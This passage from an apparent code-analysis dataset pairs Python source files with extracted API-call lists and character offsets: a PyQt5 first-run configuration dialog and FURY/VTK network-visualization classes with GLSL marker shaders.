| [
"requests.get"
] | [((193, 215), 'requests.get', 'requests.get', (['base_url'], {}), '(base_url)\n', (205, 215), False, 'import requests\n')] |
import os
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QDialog, QFileDialog
import Utils
from Configuration import Configuration
from ui.ui_designer.ui_file.uic_initDialog import Ui_initDialog
class InitDialog(QDialog):
"""
注册对话框
用于第一次打开app时进行一些设置
"""
def __init__(self):
super().__init__()
self.config = Configuration()
self.initForm = Ui_initDialog()
self.initForm.setupUi(self)
# 设置成只有关闭按钮
self.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowCloseButtonHint)
# 图标
self.setWindowIcon(QIcon('resource/imgs/logo.png'))
# 连接信号槽
self.do_connect()
pass
def do_connect(self):
self.initForm.btnFinished.clicked.connect(self._finished)
self.initForm.btnChoosePlayer.clicked.connect(self._choosePlayer)
self.initForm.btnChooseIDM.clicked.connect(self._chooseIDM)
pass
def _choosePlayer(self):
fileName_choose, filetype = QFileDialog.getOpenFileName(self,
'选择播放器',
'./',
"播放器 (*exe);")
if fileName_choose != '':
self.initForm.lblPlayer.setText(fileName_choose)
pass
def _chooseIDM(self):
fileName_choose, filetype = QFileDialog.getOpenFileName(self,
'选择下载器',
'./',
"下载器 (*exe);")
if fileName_choose != '':
self.initForm.lblIDM.setText(fileName_choose)
pass
def _finished(self):
# 记录三个值
user_name = self.initForm.txtUserName.text()
player = self.initForm.lblPlayer.text()
idm = self.initForm.lblIDM.text()
print(user_name, player, idm)
if user_name.strip() == '':
user_name = 'Master'
if player == "无":
player = None
if idm == "无":
idm = None
self.config.user_name = user_name.strip()
self.config.player_pot_path = player
self.config.idm_path = idm
self.config.first_open = False
self.config.save()
Utils.restart_program()
pass
def _closeApp(self):
# noinspection PyProtectedMember
os._exit(0)
pass
pass
| [
"PyQt5.QtGui.QIcon",
"ui.ui_designer.ui_file.uic_initDialog.Ui_initDialog",
"os._exit",
"Utils.restart_program",
"PyQt5.QtWidgets.QFileDialog.getOpenFileName",
"Configuration.Configuration"
] | [((387, 402), 'Configuration.Configuration', 'Configuration', ([], {}), '()\n', (400, 402), False, 'from Configuration import Configuration\n'), ((427, 442), 'ui.ui_designer.ui_file.uic_initDialog.Ui_initDialog', 'Ui_initDialog', ([], {}), '()\n', (440, 442), False, 'from ui.ui_designer.ui_file.uic_initDialog import Ui_initDialog\n'), ((1021, 1084), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""选择播放器"""', '"""./"""', '"""播放器 (*exe);"""'], {}), "(self, '选择播放器', './', '播放器 (*exe);')\n", (1048, 1084), False, 'from PyQt5.QtWidgets import QDialog, QFileDialog\n'), ((1448, 1511), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""选择下载器"""', '"""./"""', '"""下载器 (*exe);"""'], {}), "(self, '选择下载器', './', '下载器 (*exe);')\n", (1475, 1511), False, 'from PyQt5.QtWidgets import QDialog, QFileDialog\n'), ((2406, 2429), 'Utils.restart_program', 'Utils.restart_program', ([], {}), '()\n', (2427, 2429), False, 'import Utils\n'), ((2518, 2529), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (2526, 2529), False, 'import os\n'), ((618, 649), 'PyQt5.QtGui.QIcon', 'QIcon', (['"""resource/imgs/logo.png"""'], {}), "('resource/imgs/logo.png')\n", (623, 649), False, 'from PyQt5.QtGui import QIcon\n')] |
"""VTK Super Actors
This modules contains the VTK super actors to be used in the
network visualization.
"""
import numpy as np
from fury.shaders import add_shader_callback, attribute_to_actor
from fury.shaders import shader_to_actor, load
import fury.primitive as fp
from fury.utils import get_actor_from_primitive
from fury.utils import vertices_from_actor, array_from_actor
from fury.utils import update_actor
from fury.actor import line as line_actor
try:
from fury.shaders import shader_apply_effects
except ImportError:
shader_apply_effects = None
from fury import window
from helios.backends.fury.tools import Uniform, Uniforms
_MARKER2Id = {
'o': 0, 's': 1, 'd': 2, '^': 3, 'p': 4,
'h': 5, 's6': 6, 'x': 7, '+': 8, '3d': 0}
class FurySuperNode:
def __init__(
self,
positions,
colors=(0, 1, 0),
scales=1,
marker='3d',
edge_width=.0,
edge_opacity=1,
edge_color=(1, 1, 1),
marker_opacity=.8,
write_frag_depth=True
):
self._vcount = positions.shape[0]
self._composed_by_superactors = False
# to avoid any kind of expansive calculations when we
# are dealing with just 2d markers
self._marker_is_3d = marker == '3d'
self._write_frag_depth = write_frag_depth
self._marker_is_uniform = isinstance(marker, str)
self._marker = marker if self._marker_is_uniform else None
self._edge_color_is_uniform = len(edge_color) == 3
self._edge_opacity_is_uniform = isinstance(edge_opacity, (float, int))
self._marker_opacity_is_uniform = isinstance(
marker_opacity, (float, int))
self._edge_width_is_uniform = isinstance(edge_width, (float, int))
# self._edge_color_is_uniform = len(edge_color) == 3
self._positions_is_uniform = False
self._init_actor(
positions.shape[0], colors, scales)
self.positions = positions
self.uniforms_list = []
self._init_marker_property(marker)
self._init_edge_width_property(edge_width)
self._init_edge_color_property(edge_color)
self._init_edge_opacity_property(edge_opacity)
self._init_marker_opacity_property(marker_opacity)
self._init_specular_strength_property(25)
self._init_specular_mix_property(1.)
self._init_shadow_mix_property(0.25)
if len(self.uniforms_list) > 0:
self.Uniforms = Uniforms(self.uniforms_list)
self.uniforms_observerId = add_shader_callback(
self.vtk_actor, self.Uniforms)
self._init_shader_frag()
self.blending = 'additive'
self.depth_test = True
self._id_observer_effects = None
def start_effects(self, render_window):
if self._id_observer_effects is not None:
self.vtk_actor.GetMapper().RemoveObserver(
self._id_observer_effects)
effects = []
if self.depth_test:
effects += [window.gl_enable_depth]
else:
effects += [window.gl_disable_depth]
blendings = {
'additive': window.gl_set_additive_blending,
'subtractive': window.gl_set_subtractive_blending,
'multiplicative': window.gl_set_multiplicative_blending,
'normal': window.gl_set_normal_blending,
}
effects += [blendings[self.blending]]
self._id_observer_effects = shader_apply_effects(
render_window, self.vtk_actor,
effects=effects)
def _init_actor(self, num_nodes, colors, scales):
# to avoid memory corruption
centers = np.zeros((num_nodes, 3))
verts, faces = fp.prim_square()
res = fp.repeat_primitive(
verts, faces, centers=centers,
colors=colors,
scales=scales)
big_verts, big_faces, big_colors, big_centers = res
actor = get_actor_from_primitive(
big_verts, big_faces, big_colors)
actor.GetMapper().SetVBOShiftScaleMethod(False)
actor.GetProperty().BackfaceCullingOff()
attribute_to_actor(actor, big_centers, 'center')
self._centers_geo = array_from_actor(actor, array_name="center")
self._centers_geo_orig = np.array(self._centers_geo)
self._centers_length = int(self._centers_geo.shape[0] / num_nodes)
self._verts_geo = vertices_from_actor(actor)
self._verts_geo_orig = np.array(self._verts_geo)
self._colors_geo = array_from_actor(actor, array_name="colors")
self.vtk_actor = actor
# update to correct positions
def _init_marker_property(self, data):
if self._marker_is_uniform:
if isinstance(data, str):
data = _MARKER2Id[data]
self.uniforms_list.append(
Uniform(
name='marker', uniform_type='f', value=data))
else:
if isinstance(data[0], str):
data = [_MARKER2Id[i] for i in data]
data = np.repeat(data, 4).astype('float')
attribute_to_actor(
self.vtk_actor,
data, 'vMarker')
self._marker = array_from_actor(
self.vtk_actor, array_name="vMarker")
def _init_edge_color_property(self, edge_color):
if self._edge_color_is_uniform:
self.uniforms_list.append(
Uniform(
name='edgeColor', uniform_type='3f', value=edge_color))
else:
edge_color_by_vertex = np.repeat(
edge_color, 4, axis=0).astype('float')
attribute_to_actor(
self.vtk_actor,
edge_color_by_vertex,
'vEdgeColor')
self._edge_color = array_from_actor(
self.vtk_actor, array_name="vEdgeColor")
def _init_edge_width_property(self, edge_width):
if self._edge_width_is_uniform:
self.uniforms_list.append(
Uniform(
name='edgeWidth', uniform_type='f', value=edge_width))
else:
edge_width_by_vertex = np.repeat(edge_width, 4).astype('float')
attribute_to_actor(
self.vtk_actor,
edge_width_by_vertex,
'vEdgeWidth')
self._edge_width = array_from_actor(
self.vtk_actor, array_name="vEdgeWidth")
def _init_edge_opacity_property(self, opacity):
if self._edge_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='edgeOpacity', uniform_type='f', value=opacity))
else:
edge_opacity_by_vertex = np.repeat(opacity, 4).astype('float')
attribute_to_actor(
self.vtk_actor,
edge_opacity_by_vertex,
'vEdgeOpacity')
self._edge_opacity = array_from_actor(
self.vtk_actor, array_name="vEdgeOpacity")
def _init_marker_opacity_property(self, opacity):
if self._marker_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='markerOpacity', uniform_type='f', value=opacity))
else:
marker_opacity_by_vertex = np.repeat(opacity, 4).astype('float')
attribute_to_actor(
self.vtk_actor,
marker_opacity_by_vertex,
'vMarkerOpacity')
self._marker_opacity = array_from_actor(
self.vtk_actor, array_name="vMarkerOpacity")
def _init_specular_strength_property(self, value):
if self._marker_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='specularStrength', uniform_type='f', value=value))
def _init_shadow_mix_property(self, value):
if self._marker_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='shadowMix', uniform_type='f', value=value))
def _init_specular_mix_property(self, value):
if self._marker_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='specularMix', uniform_type='f', value=value))
@property
def shader_dec_vert(self):
shader = load("billboard_dec.vert")
if not self._marker_is_3d and not self._marker_is_uniform:
shader += """
in float vMarker;\n
out float marker;\n"""
if not self._edge_width_is_uniform:
shader += 'in float vEdgeWidth; \nout float edgeWidth;\n'
if not self._edge_color_is_uniform:
shader += 'in vec3 vEdgeColor;\n out vec3 edgeColor;\n'
if not self._edge_opacity_is_uniform:
shader += 'in float vEdgeOpacity;\n out float edgeOpacity;\n'
if not self._marker_opacity_is_uniform:
shader += 'in float vMarkerOpacity;\n out float markerOpacity;\n'
return shader
@property
def shader_impl_vert(self):
shader = load("billboard_impl.vert")
if not self._marker_is_3d and not self._marker_is_uniform:
shader += "marker = vMarker;\n"
if not self._edge_width_is_uniform:
shader += 'edgeWidth = vEdgeWidth;\n'
if not self._edge_width_is_uniform:
shader += 'edgeColor = vEdgeColor;\n'
if not self._edge_opacity_is_uniform:
shader += 'edgeOpacity = vEdgeOpacity;\n'
if not self._edge_opacity_is_uniform:
shader += 'markerOpacity = vMarkerOpacity;\n'
return shader
@property
def shader_dec_frag(self):
shader = load("billboard_dec.frag")
if self._marker_opacity_is_uniform:
shader += "uniform float markerOpacity;\n"
else:
shader += 'in float markerOpacity;\n'
if self._edge_opacity_is_uniform:
shader += "uniform float edgeOpacity;\n"
else:
shader += 'in float edgeOpacity;\n'
if self._edge_width_is_uniform:
shader += "uniform float edgeWidth;\n"
else:
shader += 'in float edgeWidth;\n'
if self._edge_color_is_uniform:
shader += "uniform vec3 edgeColor;\n"
else:
shader += 'in vec3 edgeColor;\n'
if self._marker_is_uniform:
shader += "uniform float marker;\n"
else:
shader += "in float marker;\n"
shader += "uniform float specularStrength;\n"
shader += "uniform float specularMix;\n"
shader += "uniform float shadowMix;\n"
shader += """
uniform mat4 MCDCMatrix;
uniform mat4 MCVCMatrix;
float ndot(vec2 a, vec2 b ) {
return a.x*b.x - a.y*b.y;
}
vec3 getDistFunc0(vec2 p, float s, float edgeWidth){
//circle or sphere sdf func
float sdf = 0;
float minSdf = 0;
edgeWidth = edgeWidth/2.;
minSdf = 0.5;
sdf = -length(p) + s;
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc1(vec2 p, float s, float edgeWidth){
//square sdf func
edgeWidth = edgeWidth/2.;
float minSdf = 0.5/2.0;
vec2 d = abs(p) - vec2(s, s);
float sdf = -length(max(d,0.0)) - min(max(d.x,d.y),0.0);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc2(vec2 p, float s, float edgeWidth){
//diamond sdf func
edgeWidth = edgeWidth/4.;
float minSdf = 0.5/2.0;
vec2 b = vec2(s, s/2.0);
vec2 q = abs(p);
float h = clamp((-2.0*ndot(q,b)+ndot(b,b))/dot(b,b),-1.0,1.0);
float d = length( q - 0.5*b*vec2(1.0-h,1.0+h) );
float sdf = -d * sign( q.x*b.y + q.y*b.x - b.x*b.y );
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc3(vec2 p, float s, float edgeWidth){
float l = s/1.5;
float minSdf = 1000.0;
float k = sqrt(3.0);
p.x = abs(p.x) - l;
p.y = p.y + l/k;
if( p.x+k*p.y>0.0 ) p = vec2(p.x-k*p.y,-k*p.x-p.y)/2.0;
p.x -= clamp( p.x, -2.0*l, 0.0 );
float sdf = length(p)*sign(p.y);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc4(vec2 p, float s, float edgeWidth){
edgeWidth = edgeWidth/4.;
float minSdf = 0.5/2.0;
float r = s/2.0;
const vec3 k = vec3(0.809016994,0.587785252,0.726542528);
p.x = abs(p.x);
p -= 2.0*min(dot(vec2(-k.x,k.y),p),0.0)*vec2(-k.x,k.y);
p -= 2.0*min(dot(vec2( k.x,k.y),p),0.0)*vec2( k.x,k.y);
p -= vec2(clamp(p.x,-r*k.z,r*k.z),r);
float sdf = -length(p)*sign(p.y);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc5(vec2 p, float s, float edgeWidth){
edgeWidth = edgeWidth/4.;
float minSdf = 0.5/2.0;
float r = s/2.0;
const vec3 k = vec3(-0.866025404,0.5,0.577350269);
p = abs(p);
p -= 2.0*min(dot(k.xy,p),0.0)*k.xy;
p -= vec2(clamp(p.x, -k.z*r, k.z*r), r);
float sdf = -length(p)*sign(p.y);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc6(vec2 p, float s, float edgeWidth){
float minSdf = 0.5/2.0;
edgeWidth = edgeWidth/4.;
float r = s/2.0;
const vec4 k = vec4(-0.5,0.8660254038,0.5773502692,1.7320508076);
p = abs(p);
p -= 2.0*min(dot(k.xy,p),0.0)*k.xy;
p -= 2.0*min(dot(k.yx,p),0.0)*k.yx;
p -= vec2(clamp(p.x,r*k.z,r*k.w),r);
float sdf = -length(p)*sign(p.y);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc7(vec2 p, float s, float edgeWidth){
edgeWidth = edgeWidth/8.;
float minSdf = 0.5/4.0;
float r = s/4.0;
float w = 0.5;
p = abs(p);
float sdf = -length(p-min(p.x+p.y,w)*0.5) + r;
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc8(vec2 p, float s, float edgeWidth){
edgeWidth = edgeWidth/4.;
float minSdf = 0.5/2.0;
float r = s/15.0; //corner radius
vec2 b = vec2(s/1.0, s/3.0); //base , size
//vec2 b = vec2(r, r);
p = abs(p); p = (p.y>p.x) ? p.yx : p.xy;
vec2 q = p - b;
float k = max(q.y,q.x);
vec2 w = (k>0.0) ? q : vec2(b.y-p.x,-k);
float sdf = -sign(k)*length(max(w,0.0)) - r;
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
"""
# shader += """
# vec3 getDistFunc(vec2 p, float s, float edgeWidth, int marker){
# vec3 result = vec3(0., 0., 0.);
# switch (marker) {
# """
# for i in range(0, 9):
# shader += f"""
# case {i}:
# result = getDistFunc{i}(p, s, edgeWidth);
# break;
# """
dist_func_str = """
vec3 getDistFunc(vec2 p, float s, float edgeWidth, float marker){
vec3 result = vec3(0., 0., 0.);
if (marker==0.) {
result = getDistFunc0(p, s, edgeWidth);
"""
for i in range(1, 9):
dist_func_str += f"""
{'}'}else if(marker=={i}.){'{'}
result = getDistFunc{i}(p, s, edgeWidth);
"""
dist_func_str += "\n}\nreturn result;\n}\n"
shader += dist_func_str
return shader
@property
def shader_impl_frag(self):
shader = load("billboard_impl.frag")
shader += """
float len = length(point);
float radius = 1.;
float s = 0.5;
vec3 result = getDistFunc(point.xy, s, edgeWidth, marker);
"""
shader += """
float sdf = result.x;
float minSdf = result.y;
float edgeWidthNew = result.z;
if (sdf<0.0) discard;"""
if self._marker_is_3d:
shader += """
/* Calculating the 3D distance d from the center */
float d = sqrt(1. - len*len);
/* Calculating the normal as if we had a sphere of radius len*/
vec3 normalizedPoint = normalize(vec3(point.xy, sdf));
/* Defining a fixed light direction */
vec3 direction = normalize(vec3(1., 1., 1.));
/* Calculating diffuse */
float ddf = max(0, dot(direction, normalizedPoint));
/* Calculating specular */
float ssf = pow(ddf, specularStrength);
/* Calculating colors based on a fixed light */
color = max(color*shadowMix+ddf * color, ssf * vec3(specularMix));
"""
if self._write_frag_depth and self._marker_is_3d:
shader += """
/* Obtaining the two clipping planes for depth buffer */
float far = gl_DepthRange.far;
float near = gl_DepthRange.near;
/* Getting camera Z vector */
vec3 cameraZ = vec3(MCVCMatrix[0][2], MCVCMatrix[1][2], MCVCMatrix[2][2]);
/* Get the displaced position based on camera z by adding d
in this direction */
vec4 positionDisplaced = vec4(centerVertexMCVSOutput.xyz
+cameraZ*d,1.0);
/* Projecting the displacement to the viewport */
vec4 positionDisplacedDC = (MCDCMatrix*positionDisplaced);
/* Applying perspective transformation to z */
float depth = positionDisplacedDC.z/positionDisplacedDC.w;
/* Interpolating the z of the displacement between far and near planes */
depth = ((far-near) * (depth) + near + far) / 2.0;
/* Writing the final depth to depth buffer */
gl_FragDepth = depth;
"""
shader += """
vec4 rgba = vec4( color, markerOpacity );
if (edgeWidthNew > 0.0){
if (sdf < edgeWidthNew) {
rgba = vec4(edgeColor, edgeOpacity);
}
}
fragOutput0 = rgba;
"""
return shader
def _init_shader_frag(self):
# fs_impl_code = load('billboard_impl.frag')
# if self._marker_is_3d:
# fs_impl_code += f'{load("billboard_spheres_impl.frag")}'
# else:
# fs_impl_code += f'{load("marker_billboard_impl.frag")}'
shader_to_actor(
self.vtk_actor,
"vertex", impl_code=self.shader_impl_vert,
decl_code=self.shader_dec_vert)
shader_to_actor(
self.vtk_actor,
"fragment", decl_code=self.shader_dec_frag)
shader_to_actor(
self.vtk_actor,
"fragment", impl_code=self.shader_impl_frag,
block="light")
@property
def edge_width(self):
if self._edge_width_is_uniform:
return self.Uniforms.edgeWidth.value
else:
return self._edge_width[0::self._centers_length]
@edge_width.setter
def edge_width(self, data):
if self._edge_width_is_uniform:
self.Uniforms.edgeWidth.value = data
else:
self._edge_width[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def marker(self):
if self._marker_is_uniform:
return self.Uniforms.marker.value
else:
return self._marker[::self._centers_length]
@marker.setter
def marker(self, data):
if self._marker_is_3d:
raise ValueError('3d markers cannot be changed')
if self._marker_is_uniform:
if isinstance(data, str):
data = _MARKER2Id[data]
self.Uniforms.marker.value = data
else:
if isinstance(data[0], str):
data = [_MARKER2Id[i] for i in data]
self._marker[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def edge_color(self):
if self._edge_color_is_uniform:
return self.Uniforms.edgeColor.value
else:
return self._edge_color[::self._centers_length]
@edge_color.setter
def edge_color(self, data):
if self._edge_color_is_uniform:
self.Uniforms.edgeColor.value = data
else:
self._edge_color[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def marker_opacity(self):
if self._marker_opacity_is_uniform:
return self.Uniforms.markerOpacity.value
else:
return self._marker_opacity[::self._centers_length]
@marker_opacity.setter
def marker_opacity(self, data):
if self._marker_opacity_is_uniform:
self.Uniforms.markerOpacity.value = data
else:
self._marker_opacity[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def edge_opacity(self):
if self._edge_opacity_is_uniform:
return self.Uniforms.edgeOpacity.value
else:
return self._edge_opacity[::self._centers_length]
@edge_opacity.setter
def edge_opacity(self, data):
if self._edge_opacity_is_uniform:
self.Uniforms.edgeOpacity.value = data
else:
self._edge_opacity[:] = np.repeat(
data, self._centers_length, axis=0)
self.update()
@property
def specular_strength(self):
return self.Uniforms.specularStrength.value
@specular_strength.setter
def specular_strength(self, data):
self.Uniforms.specularStrength.value = data
@property
def specular_mix(self):
return self.Uniforms.specularMix.value
@specular_mix.setter
def specular_mix(self, data):
self.Uniforms.specularMix.value = data
@property
def shadow_mix(self):
return self.Uniforms.shadowMix.value
@shadow_mix.setter
def shadow_mix(self, data):
self.Uniforms.shadowMix.value = data
@property
def positions(self):
return self._centers_geo[0::self._centers_length]
@positions.setter
def positions(self, positions):
# avoids memory corruption
self._centers_geo[:] = np.repeat(
positions, self._centers_length, axis=0).astype('float64')
self._verts_geo[:] = self._verts_geo_orig + self._centers_geo
self.update()
@property
def colors(self):
return self._colors_geo[0::self._centers_length]
@colors.setter
def colors(self, new_colors):
self._colors_geo[:] = np.repeat(
new_colors, self._centers_length, axis=0)
def update(self):
update_actor(self.vtk_actor)
def __str__(self):
return f'FurySuperActorNode num_nodes {self._vcount}'
def __repr__(self):
return f'FurySuperActorNode num_nodes {self._vcount}'
class FurySuperEdge:
def __init__(
self,
edges,
positions,
colors,
opacity=.5,
line_width=3,
blending='additive',
):
self.edges = edges
self._num_edges = len(self.edges)
self.vtk_actor = line_actor(
np.zeros((self._num_edges, 2, 3)),
colors=colors,
linewidth=line_width,
opacity=opacity
)
self._is_2d = len(positions[0]) == 2
self.positions = positions
self._colors_geo = array_from_actor(
self.vtk_actor, array_name="colors")
self.blending = blending
self.depth_test = True
self._id_observer_effects = None
def start_effects(self, render_window):
if self._id_observer_effects is not None:
self.vtk_actor.GetMapper().RemoveObserver(
self._id_observer_effects)
effects = [window.gl_enable_blend]
if self.depth_test:
effects += [window.gl_enable_depth]
else:
effects += [window.gl_disable_depth]
blendings = {
'additive': window.gl_set_additive_blending,
'subtractive': window.gl_set_subtractive_blending,
'multiplicative': window.gl_set_multiplicative_blending,
'normal': window.gl_set_normal_blending,
}
effects += [blendings[self.blending]]
self._id_observer_effects = shader_apply_effects(
render_window, self.vtk_actor,
effects=effects)
@property
def positions(self):
pass
@positions.setter
def positions(self, positions):
"""positions never it's a uniform variable
"""
# avoids memory corruption
edges_positions = vertices_from_actor(self.vtk_actor)
edges_positions[::2] = positions[self.edges[:, 0]]
edges_positions[1::2] = positions[self.edges[:, 1]]
update_actor(self.vtk_actor)
@property
def colors(self):
return self._colors_geo
@colors.setter
def colors(self, new_colors):
self._colors_geo[:] = new_colors
def update(self):
update_actor(self.vtk_actor)
class NetworkSuperActor():
def __init__(
self,
positions,
edges=None,
colors=(0, 1, 0),
scales=1,
marker='o',
node_edge_width=.0,
node_opacity=.8,
node_edge_opacity=1,
node_edge_color=(255, 255, 255),
edge_line_color=(1, 1, 1),
edge_line_opacity=.5,
edge_line_width=1,
write_frag_depth=True
):
self._is_2d = positions.shape[1] == 2
if self._is_2d:
positions = np.array([
positions[:, 0], positions[:, 1],
np.zeros(positions.shape[0])]).T
self.nodes = FurySuperNode(
positions=positions,
colors=colors,
scales=scales,
marker=marker,
edge_opacity=node_edge_opacity,
edge_width=node_edge_width,
edge_color=node_edge_color,
marker_opacity=node_opacity,
write_frag_depth=write_frag_depth
)
self.vtk_actors = [self.nodes.vtk_actor]
if edges is not None:
edges = FurySuperEdge(
edges, positions, edge_line_color, opacity=edge_line_opacity,
line_width=edge_line_width)
self.vtk_actors += [edges.vtk_actor]
self.edges = edges
@property
def positions(self):
return self.nodes.positions
@positions.setter
def positions(self, positions):
if positions.shape[1] == 2:
positions = np.array([
positions[:, 0], positions[:, 1],
np.zeros(positions.shape[0])]).T
self.nodes.positions = positions
if self.edges is not None:
self.edges.positions = positions
def update(self):
for actor in self.vtk_actors:
update_actor(actor)
| [
"fury.primitive.prim_square",
"numpy.repeat",
"fury.utils.array_from_actor",
"fury.shaders.shader_to_actor",
"fury.shaders.shader_apply_effects",
"fury.utils.vertices_from_actor",
"fury.utils.get_actor_from_primitive",
"fury.primitive.repeat_primitive",
"fury.shaders.attribute_to_actor",
"numpy.array",
"numpy.zeros",
"fury.utils.update_actor",
"helios.backends.fury.tools.Uniform",
"fury.shaders.add_shader_callback",
"fury.shaders.load",
"helios.backends.fury.tools.Uniforms"
] | [((3469, 3537), 'fury.shaders.shader_apply_effects', 'shader_apply_effects', (['render_window', 'self.vtk_actor'], {'effects': 'effects'}), '(render_window, self.vtk_actor, effects=effects)\n', (3489, 3537), False, 'from fury.shaders import shader_apply_effects\n'), ((3674, 3698), 'numpy.zeros', 'np.zeros', (['(num_nodes, 3)'], {}), '((num_nodes, 3))\n', (3682, 3698), True, 'import numpy as np\n'), ((3723, 3739), 'fury.primitive.prim_square', 'fp.prim_square', ([], {}), '()\n', (3737, 3739), True, 'import fury.primitive as fp\n'), ((3754, 3839), 'fury.primitive.repeat_primitive', 'fp.repeat_primitive', (['verts', 'faces'], {'centers': 'centers', 'colors': 'colors', 'scales': 'scales'}), '(verts, faces, centers=centers, colors=colors, scales=scales\n )\n', (3773, 3839), True, 'import fury.primitive as fp\n'), ((3949, 4007), 'fury.utils.get_actor_from_primitive', 'get_actor_from_primitive', (['big_verts', 'big_faces', 'big_colors'], {}), '(big_verts, big_faces, big_colors)\n', (3973, 4007), False, 'from fury.utils import get_actor_from_primitive\n'), ((4135, 4183), 'fury.shaders.attribute_to_actor', 'attribute_to_actor', (['actor', 'big_centers', '"""center"""'], {}), "(actor, big_centers, 'center')\n", (4153, 4183), False, 'from fury.shaders import add_shader_callback, attribute_to_actor\n'), ((4213, 4257), 'fury.utils.array_from_actor', 'array_from_actor', (['actor'], {'array_name': '"""center"""'}), "(actor, array_name='center')\n", (4229, 4257), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((4291, 4318), 'numpy.array', 'np.array', (['self._centers_geo'], {}), '(self._centers_geo)\n', (4299, 4318), True, 'import numpy as np\n'), ((4420, 4446), 'fury.utils.vertices_from_actor', 'vertices_from_actor', (['actor'], {}), '(actor)\n', (4439, 4446), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((4478, 4503), 'numpy.array', 'np.array', (['self._verts_geo'], {}), '(self._verts_geo)\n', (4486, 4503), True, 'import numpy as np\n'), ((4532, 4576), 'fury.utils.array_from_actor', 'array_from_actor', (['actor'], {'array_name': '"""colors"""'}), "(actor, array_name='colors')\n", (4548, 4576), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((8355, 8381), 'fury.shaders.load', 'load', (['"""billboard_dec.vert"""'], {}), "('billboard_dec.vert')\n", (8359, 8381), False, 'from fury.shaders import shader_to_actor, load\n'), ((9117, 9144), 'fury.shaders.load', 'load', (['"""billboard_impl.vert"""'], {}), "('billboard_impl.vert')\n", (9121, 9144), False, 'from fury.shaders import shader_to_actor, load\n'), ((9734, 9760), 'fury.shaders.load', 'load', (['"""billboard_dec.frag"""'], {}), "('billboard_dec.frag')\n", (9738, 9760), False, 'from fury.shaders import shader_to_actor, load\n'), ((16655, 16682), 'fury.shaders.load', 'load', (['"""billboard_impl.frag"""'], {}), "('billboard_impl.frag')\n", (16659, 16682), False, 'from fury.shaders import shader_to_actor, load\n'), ((19541, 19651), 'fury.shaders.shader_to_actor', 'shader_to_actor', (['self.vtk_actor', '"""vertex"""'], {'impl_code': 'self.shader_impl_vert', 'decl_code': 'self.shader_dec_vert'}), "(self.vtk_actor, 'vertex', impl_code=self.shader_impl_vert,\n decl_code=self.shader_dec_vert)\n", (19556, 19651), False, 'from fury.shaders import shader_to_actor, load\n'), ((19693, 19768), 'fury.shaders.shader_to_actor', 'shader_to_actor', (['self.vtk_actor', '"""fragment"""'], {'decl_code': 'self.shader_dec_frag'}), "(self.vtk_actor, 'fragment', decl_code=self.shader_dec_frag)\n", (19708, 19768), False, 'from fury.shaders import shader_to_actor, load\n'), ((19802, 19897), 'fury.shaders.shader_to_actor', 'shader_to_actor', (['self.vtk_actor', '"""fragment"""'], {'impl_code': 'self.shader_impl_frag', 'block': '"""light"""'}), "(self.vtk_actor, 'fragment', impl_code=self.shader_impl_frag,\n block='light')\n", (19817, 19897), False, 'from fury.shaders import shader_to_actor, load\n'), ((23828, 23879), 'numpy.repeat', 'np.repeat', (['new_colors', 'self._centers_length'], {'axis': '(0)'}), '(new_colors, self._centers_length, axis=0)\n', (23837, 23879), True, 'import numpy as np\n'), ((23924, 23952), 'fury.utils.update_actor', 'update_actor', (['self.vtk_actor'], {}), '(self.vtk_actor)\n', (23936, 23952), False, 'from fury.utils import update_actor\n'), ((24670, 24723), 'fury.utils.array_from_actor', 'array_from_actor', (['self.vtk_actor'], {'array_name': '"""colors"""'}), "(self.vtk_actor, array_name='colors')\n", (24686, 24723), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((25576, 25644), 'fury.shaders.shader_apply_effects', 'shader_apply_effects', (['render_window', 'self.vtk_actor'], {'effects': 'effects'}), '(render_window, self.vtk_actor, effects=effects)\n', (25596, 25644), False, 'from fury.shaders import shader_apply_effects\n'), ((25907, 25942), 'fury.utils.vertices_from_actor', 'vertices_from_actor', (['self.vtk_actor'], {}), '(self.vtk_actor)\n', (25926, 25942), False, 'from fury.utils import vertices_from_actor, array_from_actor\n'), ((26070, 26098), 'fury.utils.update_actor', 'update_actor', (['self.vtk_actor'], {}), '(self.vtk_actor)\n', (26082, 26098), False, 'from fury.utils import update_actor\n'), ((26294, 26322), 'fury.utils.update_actor', 'update_actor', (['self.vtk_actor'], {}), '(self.vtk_actor)\n', (26306, 26322), False, 'from fury.utils import update_actor\n'), ((2476, 2504), 'helios.backends.fury.tools.Uniforms', 'Uniforms', (['self.uniforms_list'], {}), '(self.uniforms_list)\n', (2484, 2504), False, 'from helios.backends.fury.tools import Uniform, Uniforms\n'), ((2544, 2594), 'fury.shaders.add_shader_callback', 'add_shader_callback', (['self.vtk_actor', 'self.Uniforms'], {}), '(self.vtk_actor, self.Uniforms)\n', (2563, 2594), False, 'from 